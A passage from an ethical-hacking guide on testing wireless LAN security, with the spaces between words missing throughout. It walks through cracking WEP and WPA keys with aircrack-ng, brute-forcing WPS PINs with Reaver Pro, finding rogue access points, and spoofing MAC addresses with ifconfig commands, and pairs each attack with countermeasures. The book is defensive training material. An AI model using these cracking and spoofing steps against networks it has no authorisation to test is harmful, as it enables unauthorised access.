YoucancarryoutseveralattacksagainstyourWLAN.Theassociatedcountermeasureshelpprotectyournetworkfromthesevulnerabilitiesaswellasfromthemaliciousattackspreviouslymentioned.WhentestingyourWLANsecurity,lookoutforthefollowingweaknesses:
UnencryptedwirelesstrafficWeakWEPandWPApre-sharedkeysCrackableWi-FiProtectedSetup(WPS)PINsUnauthorizedAPsEasilycircumventedMACaddresscontrolsWirelessequipmentthat’sphysicallyaccessibleDefaultconfigurationsettings
AgoodstartingpointfortestingistoattempttoattachtoyourWLANasanoutsiderandrunageneralvulnerabilityassessmenttool,suchasLanGuardorNexpose.Thistestenablesyoutoseewhatotherscanseeonyournetwork,includinginformationontheOSversion,openportsonyourAP,andevennetworksharesonwirelessclients.Figure10-4showsthetypeofinformationthatcanberevealedaboutanAPonyournetwork,includingamissingadministratorpassword,anoutdatedoperatingsystem,andopenportsandsharesthatcanbeexploited.
Don’toverlookBluetoothYouundoubtedlyhavevariousBluetooth-enabledwirelessdevices,suchaslaptopsandsmartphones,runningwithinyourorganization.Althoughvulnerabilitiesarenotasprevalentastheyarein802.11-basedWi-Finetworks,theystillexist(currently,over100Bluetooth-relatedweaknessesarelistedathttp://nvd.nist.gov),andquiteafewhackingtoolstakeadvantageofthem.YoucanevenovercomethepersonalareanetworkdistancelimitationofBluetooth’ssignal(typicallyjustafewmeters)andattackBluetoothdevicesremotelybybuildingandusingaBlueSniperrifle.(Seethefollowinglistforthewebsite.)VariousresourcesandtoolsfortestingBluetoothauthentication/pairinganddatatransferweaknessesinclude:
Blooover(http://trifinite.org/trifinite_stuff_blooover.html)
Bluelog—partofKaliLinux
BlueScanner(http://sourceforge.net/projects/bluescanner)
Bluesnarfer(www.alighieri.org/tools/bluesnarfer.tar.gz)
BlueSniperrifle(www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html)
Btscanner—partofKaliLinux
CarWhisperer(http://trifinite.org/trifinite_stuff_carwhisperer.html)
DetailedpresentationonthevariousBluetoothattacks(http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf)
Many(arguablymost)Bluetooth-relatedflawsarenothighrisk,theystillneedtobeaddressedbasedonyourownuniquecircumstances.MakesurethatBluetoothtestingfallwithinthescopeofyouroverallsecurityassessmentsandoversight.
EncryptedtrafficWirelesstrafficcanbecaptureddirectlyoutoftheairwaves,makingthiscommunicationsmediumsusceptibletoeavesdropping.Unlessthetrafficisencrypted,it’ssentandreceivedincleartextjustasonastandardwirednetwork.Ontopofthat,the802.11encryptionprotocols,WiredEquivalentPrivacy(WEP)—yep,it’sstillaround—andWi-FiProtectedAccess(WPA),havetheirownweaknessthatallowsattackerstocracktheencryptionkeysanddecryptthecapturedtraffic.ThisvulnerabilityhasreallyhelpedputWi-Fionthemap—sotospeak.
WEP,inacertainsense,actuallylivesuptoitsname:Itprovidesprivacyequivalenttothatofawirednetwork,andthensome.However,itwasn’tintendedtobecrackedsoeasily.WEPusesafairlystrongsymmetric(shared-key)encryptionalgorithmcalledRC4.HackerscanobserveencryptedwirelesstrafficandrecovertheWEPkeybecauseofaflawinhowtheRC4initializationvector(IV)isimplementedintheprotocol.ThisweaknessisbecausetheIVisonly24bitslong,whichcausesittorepeatevery16.7millionpackets—evensoonerinmanycases,basedonthenumberofwirelessclientsenteringandleavingthenetwork.
MostWEPimplementationsinitializewirelesshardwarewithanIVof0andincrementitby1foreachpacketsent.ThiscanleadtotheIVsreinitializing—startingoverat0—approximatelyeveryfivehours.Giventhisbehavior,Wi-FinetworksthathavealoweramountofusagecanbemoresecurethanlargeWi-Fi
environmentsthattransmitalotofwirelessdatabecausethere’ssimplynotenoughwirelesstrafficbeinggenerated.
UsingWEPCrack(http://sourceforge.net/projects/wepcrack),orAircrack-ng(http://aircrack-ng.org),attackersneedtocollectonlyafewminutes’uptoafewdays’(dependingonhowmuchwirelesstrafficisonthenetwork)worthofpacketstobreaktheWEPkey.Figure10-5showsairodump-ng(whichispartoftheAircrack-ngsuite)capturingWEPinitializationvectors,andFigure10-6showsaircrack’sairodumpatworkcrackingtheWEPkeyofmytestnetwork.
Figure10-5:UsingairodumptocaptureWEPinitializationvectors.
Figure10-6:UsingaircracktocrackWEP.
AirodumpandaircrackareverysimpletoruninWindows.Youjustdownloadandextracttheaircrackprograms,thecygwinLinuxsimulationenvironment,andthe
supportingpeekfilesfromhttp://aircrack-ng.organdyou’rereadytocapturepacketsandcrackaway!
Alongerkeylength,suchas128bitsor192bits,doesn’tmakeWEPexponentiallymoredifficulttocrack.ThisisbecauseWEP’sstatickeyschedulingalgorithmrequiresthatonlyabout20,000orsoadditionalpacketsbecapturedtocrackakeyforeveryextrabitinthekeylength.
ThewirelessindustrycameupwithasolutiontotheWEPproblemcalledWi-FiProtectedAccess(WPA).WPAusestheTemporalKeyIntegrityProtocol(TKIP)encryptionsystem,whichfixesalltheknownWEPissues.WPA2,whichquicklyreplacedtheoriginalWPA,usesanevenstrongerencryptionmethodcalledCounterModewithCipherBlockChainingMessageAuthenticationCodeProtocol(saythatfastthreetimes),orCCMPforshort,basedontheAdvancedEncryptionStandard(AES).WPAandWPA2runningin“enterprisemode”requirean802.1xauthenticationserver,suchasaRADIUSserver,tomanageuseraccountsfortheWLAN.
Fornon-enterprisewirelessAPs(andthereareplentyoutthereinbusiness),there’snogoodreasontonotberunningWPA2usingpre-sharedkeys(PSKs).
YoucanalsouseaircracktocrackWPAandWPA2-PSK.TocrackWPA-PSKencryption,youhavetowaitforawirelessclienttoauthenticatewithitsaccesspoint.Aquick(anddirty)waytoforcethere-authenticationprocessistosendade-authenticatepackettothebroadcastaddress.Thisissomethingmyco-author,PeterT.Davis,andIcoverindetailinourbook,HackingWirelessNetworksForDummies.
Youcanuseairodumptocapturepacketsandthenstartaircrack(youcanalsorunthemsimultaneously)toinitiatecrackingthepre-sharedkeybyusingthefollowingcommand-lineoptions:
#aircrack-ng-a2-wpath_to_wordlist<capturefile(s)>
WPAkeyrecoveryisdependentonagooddictionary.Thedictionaryfilesavailableatwww.outpost9.com/files/WordLists.htmlareagoodstartingpoint.Evenwithagreatdictionarychock-fullofpotentialpasswords,I’veoftenfoundthatdictionaryattacksagainstWPAarefutile.Knowyourlimitssoyoudon’twastetoomuchtimetryingtocrackWPAPSKsthatarenotcrackable.
AnothercommercialalternativeforcrackingWPAandWPA2keysisElcomSoftWirelessSecurityAuditor(EWSA).TouseEWSA,yousimplycapturewirelesspacketsinthetcpdumpformat(everyWLANanalyzersupportsthisformat),loadthecapturefileintotheprogram,andshortlythereafteryouhavethePSK.EWSAisalittledifferentbecauseitcancrackWPAandWPA2PSKsinafractionofthetimeitwouldnormallytake,butthere’sacaveat.Youmusthaveacomputerwithasupported
NVIDIAorAMDvideocard.Yep,EWSAdoesn’tjustusetheprocessingpowerofyourCPU—italsoharnessesthepowerandmammothaccelerationcapabilitiesofthevideocard’sgraphicsprocessingunit(GPU).Nowthat’sinnovation!
ThemainEWSAinterfaceisshowninFigure10-7.
Figure10-7:UsingElcomSoftWirelessSecurityAuditortocrackWPApre-sharedkeys.
UsingEWSA,youcantrytocrackyourWPA/WPA2PSKsatarateofupto173,000WPA/WPA2pre-sharedkeyspersecond.ComparethattothelowlyfewhundredkeyspersecondusingjusttheCPUandyoucanseethevalueinatoollikethis.Ialwayssayyougetwhatyoupayfor!
IfyouneedtouseyourWLANanalyzertoviewtrafficaspartofyoursecurityassessment,youwon’tseeanytrafficifWEPorWPA/WPA2areenabledunlessyouknowthekeysassociatedwitheachnetwork.Youcanentereachkeyintoyouranalyzer,butjustrememberthathackerscandothesamethingifthey’reabletocrackyourWEPorWPApre-sharedkeysbyusingoneofthetoolsImentionearlier.
Figure10-8showsanexampleofhowyoucanviewprotocolsonyourWLANbyenteringtheWPAkeyintoOmniPeekviatheCaptureOptionswindowbeforeyoustartyourpacketcapture.
Figure10-8:UsingOmniPeektoviewencryptedwirelesstraffic.
CountermeasuresagainstencryptedtrafficattacksThesimplestsolutiontotheWEPproblemistomigratetoWPA2forallwirelesscommunications.YoucanalsouseaVPNinaWindowsenvironment—free—byenablingPoint-to-PointTunnelingProtocol(PPTP)forclientcommunications.YoucanalsousetheIPSecsupportbuiltintoWindows,aswellasSecureShell(SSH),SecureSocketsLayer/TransportLayerSecurity(SSL/TLS),andotherproprietaryvendorsolutions,tokeepyourtrafficsecure.JustkeepinmindthattherearecrackingprogramsforPPTP,IPSec,andotherVPNprotocolsaswell,butoverall,you’reprettysafe,especiallycomparedtonoVPNatall.
Newer802.11-basedsolutionsexistaswell.Ifyoucanconfigureyourwirelesshoststoregenerateanewkeydynamicallyafteracertainnumberofpacketshavebeensent,theWEPvulnerabilitycan’tbeexploited.ManyAPvendorshavealreadyimplementedthisfixasaseparateconfigurationoption,socheckforthelatestfirmwarewithfeaturestomanagekeyrotation.Forinstance,theproprietaryCiscoLEAPprotocolusesper-userWEPkeysthatofferalayerofprotectionifyou’rerunningCiscohardware.Again,becarefulbecausecrackingprogramsexistforLEAP,suchasasleap(http://sourceforge.net/projects/asleap).ThebestthingtodoisjuststayawayfromWEP.
The802.11istandardfromtheIEEEintegratestheWPAfixesandmore.ThisstandardisanimprovementoverWPAbutisnotcompatiblewitholder802.11bhardwarebecauseofitsimplementationoftheAdvancedEncryptionStandard(AES)forencryptioninWPA2.
Ifyou’reusingWPA2withapre-sharedkey(whichismorethanenoughforsmallWi-Fi),ensurethatthekeycontainsatleast20randomcharacterssoitisn’tsusceptibletotheofflinedictionaryattacksavailableinsuchtoolsasAircrack-ngandElcomSoft
WirelessSecurityAuditor.TheattacksettingsforElcomSoftWirelessSecurityAuditorareshowninFigure10-9.
Figure10-9:ElcomSoftWirelessSecurityAuditor’snumerouspasswordcrackingoptions.
Asyoucansee,everythingfromplaindictionaryattackstocombinationattackstohybridattacksthatusespecificwordrulesareavailable.Usealong,randompre-sharedkeysoyoudon’tfallvictimtosomeonewithalotoftimeontheirhands!
KeepinmindthatalthoughWEPandweakWPApre-sharedkeysarecrackable,it’sstillmuchbetterthannoencryptionatall.Similartotheeffectthathomesecuritysystemsignshaveonwould-behomeintruders,awirelessLANrunningWEPorweakWPApre-sharedkeysisnotnearlyasattractivetoacriminalhackerasonewithoutit.Manyintrudersarelikelytomoveontoeasiertargetsunlesstheyreallywanttogetintoyours.
Wi-FiProtectedSetupWi-FiProtectedSetup(WPS)isawirelessstandardthatenablessimpleconnectivityto“secure”wirelessAPs.TheproblemwithWPSisthatitsimplementationofregistrarPINsmakeiteasytoconnecttowirelessandcanfacilitateattacksontheveryWPA/WPA2pre-sharedkeysusedtolockdowntheoverallsystem.Aswe’veseenovertheyearswithsecurity,everything’satradeoff!
WPSisintendedforconsumeruseinhomewirelessnetworks.IfyourwirelessenvironmentislikemostothersthatIsee,itprobablycontainsconsumer-gradewirelessAPs(routers)thatarevulnerabletothisattack.
TheWPSattackisrelativelystraightforwardusinganopensourcetoolcalledReaver(https://code.google.com/p/reaver-wps).Reaverworksbyexecutingabrute-forceattackagainsttheWPSPIN.Iusethecommercialversion,ReaverPro(www.reaversystems.com),whichisadevicethatyouconnectyourtestingsystemtooverEthernetorUSB.ReaverPro’sinterface,asshowninFigure10-10,isprettystraightforward.
Figure10-10:TheReaverProstartupwindow.
RunningReaverProiseasy.Yousimplyfollowthesesteps:
1. ConnecttotheReaverProdevicebypluggingyourtestingsystemintothePoELANnetworkconnection.YoushouldgetanIPaddressfromtheReaverProdeviceviaDHCP.
2. Loadawebbrowserandbrowsetohttp://10.9.8.1andloginwithreaver/fooastheusernameandpassword.
3. Onthehomescreen,presstheMenubuttonandalistofwirelessnetworksshouldappear.
4. SelectyourwirelessnetworkfromthelistandthenclickAnalyze.
5. LetReaverProrunanddoitsthing.
ThisprocessisshowninFigure10-11.
Figure10-11:UsingReaverProtodeterminethatWi-FiProtectedSetupisenabled.
IfyouwishtohaveReaverProautomaticallystartcrackingyourWPSPIN,you’llneedtoclickConfigureandsettheWPSPinsettingtoOn.WPSPINcrackingcantakeanywherefromafewminutestoafewhours,butifsuccessful,ReaverProwillreturntheWPApre-sharedkeyorwilltellyouthatthewirelessnetworkistoofarawayorthatintruderlockoutisenabled.
I’vehadmixedresultswithReaverProdependingonthecomputerI’mrunningitonandthewirelessAPthatI’mtesting.It’sstillaworthyattackyoushouldpursueifyou’relookingtofindandfixthewirelessflawsthatmatter.
CountermeasuresagainsttheWPSPINflawIt’sraretocomeacrossasecurityfixasstraightforwardasthisone:DisableWPS.IfyouneedtoleaveWPSenabled,atleastsetupMACaddresscontrolsonyourAP(s).It’snotfoolproof,butit’sbetterthannothing!Morerecentconsumer-gradewirelessroutersalsohaveintruderlockoutfortheWPSPIN.IfthesystemdetectsWPSPINcrackingattempts,itwilllockoutthoseattemptsforacertainperiodoftime.ThebestthingstodotopreventWPSattacksintheenterpriseistonotuselow-endwirelessroutersinthefirstplace.
RoguewirelessdevicesWatchoutforunauthorizedAPsandwirelessclientsthatareattachedtoyournetworkandrunninginad-hocmode.
Also,besuretoeducateyourusersonsafeWi-Fiusagewhenthey’reoutsideofyouroffice.CommunicatetothemthedangersofconnectingtounknownWi-Fiandremindthemonaperiodicandconsistentbasis.Otherwise,theirsystemscanbehackedorbecomeinfectedwithmalware,andguesswhoseproblemitisoncetheyconnectbackontoyournetwork.
ByusingNetStumbleroryourclientmanagersoftware,youcantestforAPsandad-hoc(orpeer-to-peer)devicesthatdon’tbelongonyournetwork.Youcanalsousethenetworkmonitoringfeaturesinawirelessnetworkanalyzer,suchasOmniPeekandCommViewforWiFi.
LookforthefollowingrogueAPcharacteristics:
OddSSIDs,includingthepopulardefaultonessuchaslinksysandfreepublicwifi.MACaddressesthatdon’tbelongonyournetwork.LookatthefirstthreebytesoftheMACaddress(thefirstsixnumbers),whichspecifythevendorname.YoucanperformaMACaddressvendorlookupathttp://standards.ieee.org/develop/regauth/oui/public.htmltofindinformationonAPsyou’reunsureof.Weakradiosignals,whichcanindicatethatanAPhasbeenhiddenawayorisadjacenttoorevenoutsideofyourbuilding.Communicationsacrossadifferentradiochannel(s)thanwhatyournetworkcommunicateson.DegradationinnetworkthroughputforanyWi-Ficlient.
InFigure10-12,NetStumblerhasfoundtwopotentiallyunauthorizedAPs.TheonesthatstandoutarethetwowithSSIDsofBIandLarsWorld.Noticehowthey’rerunningontwodifferentchannels,twodifferentspeeds,andaremadebytwodifferenthardwarevendors.Ifyouknowwhat’ssupposedtoberunningonyourwirelessnetwork(youdo,don’tyou?),unauthorizedsystemsshouldreallystandout.
Figure10-12:NetStumblershowingpotentiallyunauthorizedAPs.
NetStumblerdoeshaveonelimitation:Itwon’tfindAPsthathaveproberesponse
(SSIDbroadcast)packetsdisabled.CommercialwirelessnetworkanalyzerssuchasCommViewforWiFiaswellastheopensourceKismetlooknotonlyforproberesponsesfromAPslikeNetStumblerdoes,butalsoforother802.11managementpackets,suchasassociationresponsesandbeacons.ThisallowsKismettodetectthepresenceofhiddenWi-Fi.
IftheLinuxplatformisnotyourcupoftea,andyou’restilllookingforaquickanddirtywaytorootouthiddenAPs,youcancreateaclient-to-APreconnectionscenariothatforcesthebroadcastingofSSIDsusingde-authenticationpackets.YoucanfinddetailedinstructionsinthebookIwrotewithPeterT.Davis,HackingWirelessNetworksForDummies.
ThesafestwaytorootouthiddenAPsistosimplysearchfor802.11managementpackets.YoucanconfigureyourwirelessnetworkanalyzersuchasOmniPeektosearchfor802.11managementpacketsbyenablingacapturefilteron802.11managementpackets,asshowninOmniPeek’soptionsinFigure10-13.
Figure10-13:YoucanconfigureOmniPeektodetectAPsthatdon’tbroadcasttheirSSIDs.
Figure10-14showshowyoucanuseCommViewforWiFitospotanoddnetworkhost.Forinstance,intheexampleshowninFigure10-14,TechnicoandNetgearsystemsareshowingup,butonlyUbiquitihardwareisusedonthisparticularnetwork.
Figure10-14:UsingCommViewforWiFitospotwirelesssystemsthatdon’tbelong.
Mytestnetworkforthisexampleissmallcomparedtowhatyoumightsee,butyougettheideaofhowanoddsystemcanstandout.
Wi-Fisetupinad-hoc(orpeer-to-peer)modeenablewirelessclientstocommunicatedirectlywithoneanotherwithouthavingtopassthroughanAP.ThesetypesofWi-Fioperateoutsidethenormalwirelesssecuritycontrolsandcancauseserioussecurityissuesbeyondthenormal802.11vulnerabilities.
Youcanusejustaboutanywirelessnetworkanalyzertofindunauthorizedad-hocdevicesonyournetwork.Ifyoucomeacrossquiteafewad-hocsystems,suchasthosedeviceslistedasSTA(shortforstation)inCommViewforWiFi’sTypecolumn,asshowninFigure10-15,thiscouldbeagoodindicationthatone(orseveral)personisrunningunprotectedwirelesssystemsoratleasthasad-hocwirelessenabled.Thesesystemsareoftenprintersandotherseeminglybenignnetworksystems,buttheycanbeworkstationsandmobiledevices.Eitherway,they’repotentiallyputtingyournetworkandinformationatrisk,sothey’reworthcheckingout.
Figure10-15:CommViewforWifishowingseveralunauthorizedad-hocclients.
YoucanalsousethehandheldDigitalHotspotterImentionedearlierinthischapter(see“ChoosingYourTools”)tosearchforad-hoc–enabledsystemsorevenawirelessintrusionpreventionsystem(WIPS)tosearchforbeaconpacketsinwhichtheESSfieldisnotequalto1.
Walkaroundyourbuildingorcampus(warwalk,ifyouwill)toperformthistesttoseewhatyoucanfind.Physicallylookfordevicesthatdon’tbelongandkeepinmindthatawell-placedAPorWi-Ficlientthat’sturnedoffwon’tshowupinyournetworkanalysistools.Searchneartheoutskirtsofthebuildingornearanypubliclyaccessibleareas.Scopeoutboardroomsandtheofficesofupper-levelmanagersforanyunauthorizeddevices.Theseplacesmaybeoff-limits,butthat’sallthemorereasontocheckthemforrogueAPs.
Whensearchingforunauthorizedwirelessdevicesonyournetwork,keepinmindthatyoumightbepickingupsignalsfromnearbyofficesorhomes.Therefore,ifyoufindsomething,don’timmediatelyassumeit’saroguedevice.Onewaytofigureoutwhetheradeviceisinanearbyofficeorhomeisbythestrengthofthesignalyoudetect.Devicesoutsideyourofficeshouldhaveaweakersignalthanthoseinside.Usingawirelessnetworkanalyzerinthiswayhelpsnarrowthelocationandpreventfalsealarmsincaseyoudetectlegitimateneighboringwirelessdevices.
It’spaystoknowyournetworkenvironment.Knowingwhatyoursurroundingsshouldlooklikemakesiteasiertospotpotentialproblems.
AgoodwaytodeterminewhetheranAPyoudiscoverisattachedtoyourwired
networkistoperformreverseARPs(RARPs)tomapIPaddressestoMACaddresses.Youcandothisatacommandpromptbyusingthearp-acommandandsimplycomparingIPaddresseswiththecorrespondingMACaddresstoseewhetheryouhaveamatch.
Also,keepinmindthatWi-Fiauthenticatesthewirelessdevices,nottheusers.Criminalhackerscanusethistotheiradvantagebygainingaccesstoawirelessclientviaremote-accesssoftware,suchastelnetorSSH,orbyexploitingaknownapplicationorOSvulnerability.Aftertheydothat,theypotentiallyhavefullaccesstoyournetworkandyouwouldbenonethewiser.
CountermeasuresagainstroguewirelessdevicesTheonlywaytodetectrogueAPsandwirelesshostsonyournetworkistomonitoryourwirelessnetworkproactively(inrealtimeifpossible),lookingforindicatorsthatwirelessclientsorrogueAPsmightexist.AWIPSisperfectforsuchmonitoring.ButifrogueAPsorclientsdon’tshowup,thatdoesn’tmeanyou’reoffthehook.Youmightalsoneedtobreakoutthewirelessnetworkanalyzerorothernetworkmanagementapplication.
Usepersonalfirewallsoftware,suchasWindowsFirewall,onallwirelesshoststopreventunauthorizedremoteaccessintoyourhosts,andsubsequently,yournetwork.
Finally,don’tforgetaboutusereducation.It’snotfoolproof,butitcanhelpserveasanadditionallayerordefense.Ensurethatsecurityisalwaysonthetopofeveryone’smind.Chapter19containsadditionalinformationaboutuserawarenessandtraining.
MACspoofingAcommondefenseforwirelessnetworksisMediaAccessControl(MAC)addresscontrols.ThisiswhereyouconfigureyourAPstoallowonlywirelessclientswithknownMACaddressestoconnecttothenetwork.Consequently,averycommonhackagainstwirelessnetworksisMACaddressspoofing.
ThebadguyscaneasilyspoofMACaddressesinLinux,byusingtheifconfigcommand,andinWindows,byusingtheSMACutility,asIdescribeinChapter9.However,likeWEPandWPA,MACaddress-basedaccesscontrolsareanotherlayerofprotectionandbetterthannothingatall.IfsomeonespoofsoneofyourMACaddresses,theonlywaytodetectmaliciousbehavioristhroughcontextualawarenessbyspottingthesameMACaddressbeingusedintwoormoreplacesontheWLAN,whichcanbetricky.
OnesimplewaytodeterminewhetheranAPisusingMACaddresscontrolsistotrytoassociatewithitandobtainanIPaddressviaDHCP.IfyoucangetanIP
address,theAPdoesn’thaveMACaddresscontrolsenabled.
ThefollowingstepsoutlinehowyoucantestyourMACaddresscontrolsanddemonstratejusthoweasytheyaretocircumvent:
1. FindanAPtoattachto.
YoucandothissimplybyloadingNetStumbler,asshowninFigure10-16.
Inthistestnetwork,theAPwiththeSSIDofdoh!istheoneIwanttotest.NotetheMACaddressofthisAPaswell.Thiswillhelpyoumakesureyou’relookingattherightpacketsinthestepsthatfollow.AlthoughI’vehiddenmostoftheMACaddressofthisAPforthesakeofprivacy,let’sjustsayitsMACaddressis00:40:96:FF:FF:FF.Also,noticeinFigure10-16thatNetStumblerwasabletodeterminetheIPaddressoftheAP.GettinganIPaddresswillhelpyouconfirmthatyou’reontherightwirelessnetwork.
2. UsingaWLANanalyzer,lookforawirelessclientsendingaproberequestpackettothebroadcastaddressortheAPreplyingwithaproberesponse.
Youcansetupafilterinyouranalyzertolookforsuchframes,oryoucansimplycapturepacketsandjustbrowsethroughlookingfortheAP’sMACaddress,whichyounotedinStep1.Figure10-17showswhattheProbeRequestandProbeResponsepacketslooklike.
Notethatthewirelessclient(againforprivacy,supposeitsfullMACaddressis00:09:5B:FF:FF:FF)firstsendsoutaproberequesttothebroadcastaddress(FF:FF:FF:FF:FF:FF)inpacketnumber98.TheAPwiththeMACaddressI’mlookingforreplieswithaProbeResponseto00:09:5B:FF:FF:FF,confirmingthatthisisindeedawirelessclientonthenetworkforwhichI’llbetestingMACaddresscontrols.
3. Changeyourtestcomputer’sMACaddresstothatofthewirelessclient’sMACaddressyoufoundinStep2.
InUNIXandLinux,youcanchangeyourMACaddressveryeasilybyusingtheifconfigcommandasfollows:
a. Loginasrootandthendisablethenetworkinterface.
Insertthenetworkinterfacenumberthatyouwanttodisable(typicallywlan0orath0)intothecommand,likethis:
[root@localhostroot]#ifconfigwlan0down
b. EnterthenewMACaddressyouwanttouse.
InsertthefakeMACaddressandthenetworkinterfacenumberlikethis:[root@localhostroot]#ifconfigwlan0hwether01:23:45:67:89:ab
ThefollowingcommandalsoworksinLinux:[root@localhostroot]#iplinksetwlan0address01:23:45:67:89:ab
c. Bringtheinterfacebackupwiththiscommand:
[root@localhostroot]#ifconfigwlan0up
IfyouchangeyourLinuxMACaddressesoften,youcanuseamorefeature-richutilitycalledGNUMACChanger(https://github.com/alobbs/macchanger).
MorerecentversionsofWindowsmakeitdifficulttochangeyourMACaddress.YoumightbeabletochangeyourMACaddressesinyourwirelessNICpropertiesviaControlPanel.However,ifyoudon’tliketweakingtheOSinthismanner(orcannot),youcantryaneatandinexpensivetoolcreatedbyKLCConsultingcalledSMAC(availableatwww.klcconsulting.net/smac).TochangeyourMACaddress,youcanusethestepsIoutlineinChapter9.
Whenyou’redone,SMACpresentssomethingsimilartothescreenshowninFigure10-18.
ToreverseanyoftheprecedingMACaddresschanges,simplyreversethestepsperformedandthendeleteanydatayoucreated.
NotethatAPs,routers,switches,andthelikemightdetectwhenmorethanonesystemisusingthesameMACaddressonthenetwork(thatis,yoursandthehostthatyou’respoofing).Youmighthavetowaituntilthatsystemisnolongeronthenetwork;however,IrarelyseeanyissuesspoofingMACaddressesinthisway,soyouprobablywon’thavetodoanything.
4. EnsurethatyouareconnectedtotheappropriateSSID.
EvenifyournetworkisrunningWEPorWPA,youcanstilltestyourMACaddresscontrols.Youjustneedtoenteryourencryptionkey(s)beforeyoucanconnect.
5. ObtainanIPaddressonthenetwork.
Youcandothisbyrebootingordisabling/enablingyourwirelessNIC.However,youcandoitmanuallybyrunningipconfig/renewataWindowscommandpromptorbymanuallyenteringaknownIPaddressinyourwirelessnetworkcard’snetworkproperties.
6. Confirmthatyou’reonthenetworkbypinginganotherhostorbrowsingtheInternet.
Inthisexample,IcouldpingtheAP(10.11.12.154)orsimplyloadmyfavoritewebbrowsertoseewhetherIcanaccesstheInternet.
Figure10-16:FindinganaccessibleAPviaNetStumbler.
Figure10-17:LookingfortheMACaddressofawirelessclientonthenetworkbeingtested.
Figure10-18:SMACshowingaspoofedMACaddress.
That’sallthereistoit!You’vecircumventedyourwirelessnetwork’sMACaddresscontrolsinsixsimplesteps.Pieceofcake!
CountermeasuresagainstMACspoofingTheeasiestwaytopreventthecircumventionofMACaddresscontrolsandsubsequentunauthorizedattachmenttoyourwirelessnetworkistoenableWPA2.AnotherwaytocontrolMACspoofingisbyusingaWIPS.Thissecondoptioniscertainlymorecostly,butitcouldbewellworththemoneywhenyouconsidertheotherproactivemonitoringandblockingbenefitssuchasystemwouldprovide.
PhysicalsecurityproblemsVariousphysicalsecurityvulnerabilitiescanresultinphysicaltheft,thereconfigurationofwirelessdevices,andthecapturingofconfidentialinformation.Youshouldlookforthefollowingsecurityvulnerabilitieswhentestingyoursystems:
APsmountedontheoutsideofabuildingandaccessibletothepublic.Poorlymountedantennas—orthewrongtypesofantennas—thatbroadcasttoostrongasignalandthatareaccessibletothepublic.YoucanviewthesignalstrengthinNetStumbler,yourwirelessclientmanager,oroneofthecommercialtoolsImentionearlierinthischapter.
Theseissuesareoftenoverlookedbecauseofrushedinstallations,improperplanning,andlackoftechnicalknowledge,buttheycancomebacktohauntyou.ThebookWirelessNetworksForDummiesprovidesmoredetails.
Countermeasuresagainstphysicalsecurityproblems
EnsurethatAPs,antennas,andotherwirelessandnetworkinfrastructureequipmentarelockedawayinsecureclosets,ceilings,orotherplacesthataredifficultforawould-beintrudertoaccessphysically.TerminateyourAPsoutsideanyfirewallorothernetworkperimetersecuritydevices—oratleastinaDMZ—wheneverpossible.Ifyouplaceunsecuredwirelessequipmentinsideyoursecurenetwork,itcannegateanybenefitsyouwouldgetfromyourperimetersecuritydevices,suchasyourfirewall.
Ifwirelesssignalsarepropagatingoutsideyourbuildingwheretheydon’tbelong,either
TurndownthetransmitpowersettingofyourAP.Useasmallerordifferentantenna(semidirectionalordirectional)todecreasethesignal.
Somebasicplanninghelpspreventthesevulnerabilities.
VulnerablewirelessworkstationsWirelessworkstationssuchasWindows-basedlaptopscanhavetonsofsecurityvulnerabilities—fromweakpasswordstounpatchedsecurityholestothestorageofWEPandWPAencryptionkeyslocally.Mostofthewell-knownwirelessclientvulnerabilitieshavebeenpatchedbytheirrespectivevendors,butyouneverknowwhetherallyourwirelesssystemsarerunningthelatest(andusuallysafest)versionsofoperatingsystems,wirelessclientsoftware,andothersoftwareapplications.
Inadditiontousingthewirelessclient,stumbling,andnetworkanalysissoftwareImentionearlierinthischapter,youshouldalsosearchforwirelessclientvulnerabilitiesbyperformingauthenticatedscansusingvariousvulnerabilitytestingtools,suchasGFILanGuard,Nexpose,andAcunetixWebVulnerabilityScanner.
Theseprogramsaren’twireless-specific,buttheymightturnupvulnerabilitiesinyourwirelesscomputersthatyoumightnothavediscoveredorthoughtabouttestingotherwise.IcoveroperatingsystemandapplicationvulnerabilitiesaswellasusingthetoolsintheprecedinglistinPartsIVandVofthisbook.
CountermeasuresagainstvulnerablewirelessworkstationsYoucanimplementthefollowingcountermeasurestokeepyourworkstationsfrombeingusedasentrypointsintoyourwirelessnetwork:
Regularlyperformvulnerabilityassessmentsonyourwirelessworkstations,inadditiontoothernetworkhosts.Applythelatestvendorsecuritypatchesandenforcestronguserpasswords.Usepersonalfirewallsandendpointsecuritysoftwareonallwirelesssystemswherepossible,includingphonesandtablets,tokeepmaliciousintrudersoffthosesystemsandoutofyournetwork.
Installanti-malwaresoftware.
DefaultconfigurationsettingsSimilartowirelessworkstations,wirelessAPshavemanyknownvulnerabilities.ThemostcommononesaredefaultSSIDsandadminpasswords.Themorespecificonesoccuronlyoncertainhardwareandsoftwareversionsthatarepostedinvulnerabilitydatabasesandvendorwebsites.ManywirelesssystemsstillhaveWEPandWPAdisabledbydefaultaswell.
CountermeasuresagainstdefaultconfigurationsettingsexploitsYoucanimplementsomeofthesimplestandmosteffectivesecuritycountermeasuresforWi-Fi—andthey’reallfree:
MakesurethatyouchangedefaultadminpasswordsandSSIDs.Ataminimum,enableWPA2.Useverystrongpre-sharedkeys(PSKs)consistingofatleast20randomcharactersoruseWPA/WPA2inenterprisemodewithaRADIUSserverforhostauthentication.DisableSSIDbroadcastingifyoudon’tneedthisfeature.ApplythelatestfirmwarepatchesforyourAPsandWi-Ficards.ThiscountermeasurehelpstopreventvariousvulnerabilitiestominimizetheexploitationofpubliclyknownholesrelatedtomanagementinterfacesonAPsandclient-managementsoftwareontheclients.
MobileDevicesInThisChapter
Seekingoutthecommonweaknessesinlaptops,phones,andtablets
Executingsecurityteststouncovercrucialmobileflaws
ExploringthesecurityvulnerabilitiesassociatedwiththeInternetofThings(IoT)
Minimizingmobilesecurityrisks
Mobilecomputingisthenewtargetforbusiness—andforhacking.Itseemsthateveryonehasamobiledeviceofsomesortforeitherpersonalorbusinessuse;oftenboth.Ifnotproperlysecured,mobiledevicesconnectedtotheenterprisenetworkrepresentthousandsuponthousandsofunprotectedislandsofinformationfloatingabout,outofyourcontrol.
Becauseofallthephones,tablets,andlaptopsrunningnumerousoperatingsystemplatformschock-fullofapps,aninfinitenumberofrisksareassociatedwithmobilecomputing.Ratherthandelvingintoallthevariables,thischapterexploressomeofthebiggest,mostcommonmobilesecurityflawsthatcouldimpactyouandyourbusiness.
